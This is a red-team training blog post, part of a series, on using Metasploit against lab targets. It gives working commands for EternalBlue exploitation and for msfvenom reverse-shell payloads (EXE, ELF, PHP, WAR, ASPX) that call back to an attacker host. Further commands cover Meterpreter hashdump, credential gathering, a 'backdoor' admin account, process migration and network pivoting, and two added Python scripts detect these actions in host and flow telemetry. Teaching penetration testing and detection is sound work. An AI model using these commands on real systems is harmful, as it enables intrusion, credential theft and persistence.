Metasploit: The Exploitation Framework That Handles the Complexity
- Tony Kelly
- May 25
- 7 min read

Series: The Community's Red Team
Post: 12 of 17
Tags: metasploit, msfconsole, meterpreter, exploitation, post-exploitation, tools
Read time: ~13 min
Prerequisites: Post 01 — Methodology Overview, Post 11 — Netcat
Metasploit has a reputation problem. In movies and TV it's the "press button, get hacked" tool that makes hacking look trivial. In beginner CTF writeups it's treated as a crutch. In real security work, it's an industrial-grade framework that senior red teamers use every day because it handles complexity that would take hours to build manually.
The truth is somewhere in the middle: Metasploit doesn't do the thinking for you, but it does handle an enormous amount of technical complexity so you can focus on the engagement rather than the implementation. Payload staging, session management, post-exploitation modules, pivoting through networks — all of it is built in and works together.
This post covers how Metasploit actually works, the core workflow you'll repeat on every engagement, Meterpreter's post-exploitation capabilities, and when to use the framework vs. manual techniques.
What Metasploit Is
Metasploit is a Ruby framework organized around modules. Each module does one specific thing:
Exploit modules — take a vulnerability and use it to get code execution on a target. They deliver a payload.
Payload modules — the code that runs on the target after exploitation. This is what gives you a shell.
Auxiliary modules — scanners, fuzzers, brute force tools, information gathering. No payload needed — they just run and return data.
Post modules — run after you have a session. Hashdumps, privilege escalation checks, information gathering from inside a compromised machine.
Encoder modules — transform payloads to evade detection.
Everything works together: an exploit module selects a payload, delivers it, creates a session, and then post modules work against that session.
Starting and Navigating msfconsole
msfconsole -q # -q skips the banner, launches faster
Inside the console:
search <term> # Search modules by name, CVE, or platform
use <module_path> # Select a module
info # Show details about the current module
show options # Show required and optional settings
show payloads # List compatible payloads for current module
set <OPTION> <value> # Set an option
setg <OPTION> <value> # Set globally (persists across modules)
unset <OPTION> # Clear an option
exploit / run # Launch the module
sessions -l # List active sessions
sessions -i <id> # Interact with a session
sessions -k <id> # Kill a session
background # Background current session (or Ctrl+Z)
jobs # List running background jobs
The most common beginner failure: forgetting to set LHOST. Always run show options before launching and verify all required fields are set.
The Core Exploitation Workflow
Step 1 — Search for the right module
# Search by CVE
search cve:2017-0144
# Search by name
search type:exploit name:eternalblue
search type:exploit name:tomcat
# Search by platform
search platform:windows type:exploit smb
# Search auxiliary scanners
search type:auxiliary name:smb_ms17
Step 2 — Select and configure the module
use exploit/windows/smb/ms17_010_psexec
show options
set RHOSTS 10.10.10.50
set LHOST 10.10.14.5 # your attack machine IP (tun0 on HTB)
set LPORT 4444
RHOSTS — target IP(s). Accepts a single IP, a CIDR range, or a path to a file containing one target per line.
LHOST — your machine's IP. On HackTheBox/CTF this is your tun0 VPN interface. Get it with ip a show tun0.
Check show payloads to see what payload options you have. The default is usually fine but you may want to change it:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Step 3 — Run it
exploit
# or
run
# or to run as a background job:
exploit -j
A successful run gives you a Meterpreter session (or a shell, depending on payload). The session counter shows in the output:
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.50:49832)
Staged vs Stageless Payloads
This distinction matters for reliability and detection:
Staged payload (e.g. windows/x64/meterpreter/reverse_tcp) — sends a small initial payload that then downloads the full Meterpreter from your machine. Requires a handler listening on LHOST:LPORT. Smaller initial footprint.
Stageless payload (e.g. windows/x64/meterpreter_reverse_tcp) — the full Meterpreter is embedded in the payload. Larger but doesn't need a separate download step. More reliable in restrictive network environments.
Note the difference in the payload name: meterpreter/reverse_tcp (staged, forward slash) vs meterpreter_reverse_tcp (stageless, underscore).
For CTF environments, staged is usually fine. For environments with tight egress filtering, stageless is more reliable.
Catching Shells with multi/handler
When you generate a payload with msfvenom and execute it manually on a target, you need a handler to catch the connection:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp # match your payload exactly
set LHOST 10.10.14.5
set LPORT 4444
exploit -j # run as background job so you can keep using the console
The payload type in your handler must match the payload you generated with msfvenom exactly. Mismatch = no session.
Meterpreter: The Good Stuff
A basic Netcat shell gives you a terminal. Meterpreter gives you a programmable interface to the compromised system. Here's what you can do:
System information
sysinfo # OS, hostname, architecture, language
getuid # Current user (who are you running as?)
getpid # Current process ID
ps # List running processes
Privilege escalation
getsystem # Try common privesc techniques automatically
getuid # Verify you're now SYSTEM/root
getsystem attempts several escalation techniques in sequence. It doesn't always work, but when it does it's one command.
File operations
pwd # Current directory on target
ls # List files
cd <path> # Change directory
cat <file> # Read file contents
download <file> # Download to your attack machine
upload /path/to/local/file # Upload to target
File transfers through Meterpreter are encrypted and don't require setting up separate HTTP servers or Netcat listeners.
Shell access
shell # Drop to a native OS shell (cmd.exe or /bin/bash)
# Ctrl+Z to background and return to Meterpreter
Process migration
migrate <pid> # Move Meterpreter into another process
Migration is important for stability and stealth. If your initial exploit ran in a web server process that gets restarted, your session dies. Migrate to a stable process like explorer.exe or svchost.exe to persist. Also useful for privilege escalation — if a process running as a higher-privilege user is on the machine, migrating into it can elevate your access.
Enable RDP
run post/windows/manage/enable_rdp
One command enables Remote Desktop on a Windows target so you can connect graphically.
Post-Exploitation Modules
Post modules run against existing sessions and automate common post-exploitation tasks:
# List privesc opportunities
run post/multi/recon/local_exploit_suggester
# Dump local password hashes
run post/windows/gather/hashdump
# Gather saved credentials from browsers and applications
run post/windows/gather/credentials/credential_collector
# Enable RDP
run post/windows/manage/enable_rdp
# Add a persistent backdoor user
run post/windows/manage/add_user USERNAME=backdoor PASSWORD=Password123!
To run a post module against a specific session:
sessions -l # Get the session ID
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
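The post modules above, and the migrate step earlier in this post, each leave a distinct trace in Windows host telemetry: process migration typically shows up as Sysmon Event 8 (a remote thread created in the target process), enable_rdp flips fDenyTSConnections to 0 (Sysmon Event 13), and a new local account appears as Security event 4720, often followed by 4732 when it is added to Administrators. The correlator below is an added example written for this post, not Metasploit code or any vendor's detection content. The event records are constructed, the field names are an assumed SIEM layout rather than a real schema, and the allowlist, high-value process list and 600-second window are starting values to tune per environment.

```python
"""Correlate constructed Windows host telemetry for the post-exploitation
actions described in this post (migrate, enable_rdp, add_user).
Added example; field names below are assumptions, not a vendor schema."""
from collections import defaultdict
import ntpath

# Processes an operator migrates into for stability; also where a remote
# thread from an unknown binary is least welcome (assumption: tune per estate).
HIGH_VALUE_TARGETS = {"explorer.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}
# Sources that legitimately create remote threads (assumption: tune per estate).
REMOTE_THREAD_ALLOWLIST = {"csrss.exe", "wininit.exe"}

# Constructed sample telemetry (not real data). shell.exe is the msfvenom output name used in this post.
SAMPLE_EVENTS = [
    # Benign: csrss creating a thread in explorer is normal Windows behaviour.
    {"ts": 10, "host": "web01", "provider": "Sysmon", "id": 8,
     "source_image": r"C:\Windows\System32\csrss.exe", "target_image": r"C:\Windows\explorer.exe"},
    # A dropped binary creating a thread in explorer.exe: what `migrate` looks like.
    {"ts": 100, "host": "web01", "provider": "Sysmon", "id": 8,
     "source_image": r"C:\Windows\Temp\shell.exe", "target_image": r"C:\Windows\explorer.exe"},
    # fDenyTSConnections set to 0: what enable_rdp does to the registry.
    {"ts": 160, "host": "web01", "provider": "Sysmon", "id": 13,
     "target_object": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    # Local account created, then added to Administrators.
    {"ts": 200, "host": "web01", "provider": "Security", "id": 4720, "account": "backdoor"},
    {"ts": 205, "host": "web01", "provider": "Security", "id": 4732, "member": "backdoor", "group": "Administrators"},
    # Unrelated host: an account is created with no other indicators.
    {"ts": 300, "host": "hr-pc7", "provider": "Security", "id": 4720, "account": "jsmith"},
]


def basename(image):
    return ntpath.basename(image).lower()


def check_remote_thread(ev):
    """Sysmon 8: remote thread into a high-value process from a non-allowlisted source."""
    if ev["provider"] != "Sysmon" or ev["id"] != 8:
        return None
    src, dst = basename(ev["source_image"]), basename(ev["target_image"])
    if dst in HIGH_VALUE_TARGETS and src not in REMOTE_THREAD_ALLOWLIST:
        return "remote_thread_into_high_value_process"
    return None


def check_rdp_enabled(ev):
    """Sysmon 13: fDenyTSConnections written as DWORD 0 (RDP turned on)."""
    if ev["provider"] != "Sysmon" or ev["id"] != 13:
        return None
    path = ev["target_object"].lower()
    if path.endswith(r"\terminal server\fdenytsconnections") and ev["details"].endswith("(0x00000000)"):
        return "rdp_enabled_via_registry"
    return None


def analyze(events, window=600):
    """Return one alert dict per rule hit, in time order."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    created = defaultdict(dict)  # host -> account -> ts of the 4720 event
    for ev in events:
        host = ev["host"]
        for rule in (check_remote_thread, check_rdp_enabled):
            hit = rule(ev)
            if hit:
                alerts.append({"host": host, "ts": ev["ts"], "rule": hit})
        if ev["provider"] == "Security" and ev["id"] == 4720:
            created[host][ev["account"].lower()] = ev["ts"]
            alerts.append({"host": host, "ts": ev["ts"], "rule": "local_account_created"})
        if ev["provider"] == "Security" and ev["id"] == 4732 and ev["group"].lower() == "administrators":
            t0 = created[host].get(ev["member"].lower())
            # Only escalate when the account was created moments earlier on the same host.
            if t0 is not None and ev["ts"] - t0 <= window:
                alerts.append({"host": host, "ts": ev["ts"], "rule": "new_account_added_to_administrators"})
    return alerts


def hosts_with_cluster(alerts, min_rules=2, window=600):
    """Hosts where at least min_rules distinct rules fired within window seconds."""
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append(a)
    flagged = {}
    for host, items in by_host.items():
        items.sort(key=lambda a: a["ts"])
        for i, a in enumerate(items):
            rules = {b["rule"] for b in items[i:] if b["ts"] - a["ts"] <= window}
            if len(rules) >= min_rules:
                flagged[host] = sorted(rules)
                break
    return flagged


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
    print("clustered:", hosts_with_cluster(analyze(SAMPLE_EVENTS)))
```

A single 4720 on a workstation is routine, which is why hr-pc7 is not flagged; the value of the correlator is that a remote thread into explorer.exe, an RDP registry flip and a new admin account on the same host within minutes is the sequence this post teaches, and almost never what an administrator does by hand.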
Pivoting with Metasploit
Once you have a Meterpreter session on a machine that can reach an internal network, Metasploit can route traffic through it:
# Background the session
background # or Ctrl+Z
# Add a route through the session into the internal network
sessions -i 1
run autoroute -s 172.16.5.0/16
background # back to msfconsole; the SOCKS module runs there, not inside Meterpreter
# Start a SOCKS proxy through the session
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
# Now configure proxychains and use any tool through the tunnel
# /etc/proxychains.conf: socks4 127.0.0.1 9050
proxychains nmap -Pn -sT 172.16.5.19
This makes the entire internal network reachable from your attack machine through the Meterpreter session. Covered in more depth in Post 15 (Chisel) and Post 16 (Ligolo-ng).
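From the network side, the callback the multi/handler section waits for and the pivot just described both stand out from ordinary traffic: the compromised host opens an outbound TCP connection to the handler port (4444 is the default LPORT used throughout this post), and a SOCKS pivot used for scanning sources every probe from the pivot host itself, so one internal address suddenly reaches many distinct destination:port pairs in a short window. The script below is an added example written for this post, not Metasploit code. The flow records are constructed, 172.16.5.50 is an invented address for the pivot host's internal interface, the record layout is an assumed export format, and the 120-second window and threshold of 20 are starting values.

```python
"""Two flow-log checks for the behaviour described above: reverse-shell
callbacks to a handler port, and one host fanning out to many internal
destinations (a SOCKS pivot driving a scan). Added example; flows constructed."""
from collections import defaultdict

FIELDS = ("ts", "src", "dst", "dport", "proto")
HANDLER_PORTS = {4444}  # the post's default LPORT; extend with ports seen in your own handlers


def build_sample_flows():
    """Constructed flow records (not a capture) as dicts with FIELDS keys."""
    rows = [
        # The reverse_tcp callback: the compromised host connects out to the handler.
        (1000, "10.10.10.50", "10.10.14.5", 4444, "tcp"),
        (1040, "10.10.10.50", "10.10.14.5", 4444, "tcp"),
        # Ordinary traffic.
        (1100, "10.10.10.20", "10.10.10.5", 53, "udp"),
        (1110, "10.10.10.21", "10.10.10.50", 443, "tcp"),
    ]
    # proxychains nmap -sT 172.16.5.19 through the pivot: every probe leaves the
    # pivot host's own interface (172.16.5.50 here, a constructed address).
    for i, port in enumerate((21, 22, 80, 135, 139, 443, 445, 3389, 8080, 8443, 5985, 1433)):
        rows.append((1200 + i, "172.16.5.50", "172.16.5.19", port, "tcp"))
    # ...followed by an SMB sweep of neighbouring hosts, one per second.
    for k, last_octet in enumerate(range(20, 40)):
        rows.append((1300 + k, "172.16.5.50", f"172.16.5.{last_octet}", 445, "tcp"))
    return [dict(zip(FIELDS, r)) for r in rows]


def handler_port_callbacks(flows, ports=HANDLER_PORTS):
    """Distinct (src, dst, dport) triples for TCP connections to a handler port.
    A weak indicator on its own (defaults are easy to change) but cheap to check."""
    seen = []
    for f in flows:
        if f["proto"] == "tcp" and f["dport"] in ports:
            triple = (f["src"], f["dst"], f["dport"])
            if triple not in seen:
                seen.append(triple)
    return seen


def fanout_sources(flows, window=120, threshold=20):
    """Sources that reached at least `threshold` distinct dst:port pairs within
    any `window`-second span. Returns {src: max_distinct_pairs}."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f["src"]].append((f["ts"], (f["dst"], f["dport"])))
    flagged = {}
    for src, items in by_src.items():
        items.sort()
        best = 0
        for i, (t0, _) in enumerate(items):
            # Sliding window anchored at each flow; count distinct destinations inside it.
            pairs = {pair for t, pair in items[i:] if t - t0 <= window}
            best = max(best, len(pairs))
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    flows = build_sample_flows()
    print("handler callbacks:", handler_port_callbacks(flows))
    print("fan-out sources:", fanout_sources(flows))
```

The fan-out check is the more durable of the two: a port or LPORT is trivial to change, but a scan driven through a pivot cannot avoid sourcing its probes from the pivot host, and a web server that starts talking to twenty neighbours on 445 inside two minutes is worth a look regardless of which tool did it.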
Auxiliary Modules: Scanning and Enumeration
Metasploit isn't just for exploitation. Auxiliary modules are useful for scanning and service-specific checks:
# Check if a target is vulnerable to EternalBlue before exploiting
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.10.0/24
run
# SMB version scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run
# Tomcat credential brute force
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <target>
set RPORT 8080
run
# HTTP directory scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS <target>
run
Using auxiliary/scanner/smb/smb_ms17_010 before the exploit confirms the target is vulnerable without triggering the exploitation — quieter and saves time if the target is already patched.
msfvenom: Generating Standalone Payloads
When you need a payload that runs outside of msfconsole — an executable to upload, a web shell, a WAR file for Tomcat — use msfvenom:
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf
# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.php
# Tomcat WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f war -o shell.war
# ASP for IIS
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx
# List all payloads
msfvenom --list payloads | grep windows
# List all formats
msfvenom --list formats
When you deploy an msfvenom payload, set up your multi/handler before triggering the payload execution — the handler needs to be waiting when the connection arrives.
When to Use Metasploit vs Manual Exploitation
Metasploit handles the plumbing — payload delivery, session management, encrypted communications, pivoting infrastructure. It's the right choice when:
You have a known CVE and a Metasploit module exists for it
You need post-exploitation capabilities beyond a basic shell
You're managing multiple sessions on a complex network
You want pivoting through a Meterpreter session
Manual exploitation (writing your own exploit code, using standalone tools like Impacket) is right when:
No Metasploit module exists for the vulnerability
You're in an environment where dropping a Meterpreter binary would trigger EDR
OSCP exam constraints require manual exploitation (check current rules before your exam)
You want to actually understand what the exploit does
The CPTS exam doesn't restrict Metasploit use. OSCP has historically limited it — check current rules if certification prep is your goal.
Common Problems and Fixes
"Exploit completed, but no session was created": Most common cause: LHOST is wrong. Verify your attack machine IP on the correct interface (tun0 for HTB, eth0 for local lab). Also check if the target can reach your LHOST — test with a ping or curl callback first.
Session immediately dies: Migrate to a stable process immediately after getting the session: migrate <pid> to explorer.exe or svchost.exe.
Module says "no compatible payloads": The architecture may not match — the target is 32-bit but you're loading a 64-bit payload. Run show payloads and look for x86 options.
getsystem fails: Manual privilege escalation needed. Run post/multi/recon/local_exploit_suggester to find opportunities, then tackle them manually or with specific modules.
Quick Reference
# Launch
msfconsole -q
# Navigation
search type:exploit cve:2017-0144
use exploit/windows/smb/ms17_010_psexec
show options
set RHOSTS <target>
set LHOST <your_ip>
setg LHOST <your_ip> # global — set once, works everywhere
exploit -j
# Handler
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
exploit -j
# Sessions
sessions -l
sessions -i 1
background
# Meterpreter
sysinfo | getuid | getpid | ps
getsystem
shell
migrate <pid>
download <file>
upload <file> <remote_path>
run post/multi/recon/local_exploit_suggester
run post/windows/gather/hashdump
# Pivoting
run autoroute -s 172.16.5.0/16
# msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f war -o shell.war
msfvenom --list payloads | grep linux
What's Next
With Metasploit handling exploitation and session management, the next two posts cover privilege escalation — what you do after you get a shell but need more access. Post 13 (LinPEAS/WinPEAS) is the automated recon tool that finds the privesc opportunities on Linux and Windows targets. It's the first thing you run on every machine you land on.
MeshForge — Training the Community's Red Team
They count on your ignorance. The exploit only works on the uninformed.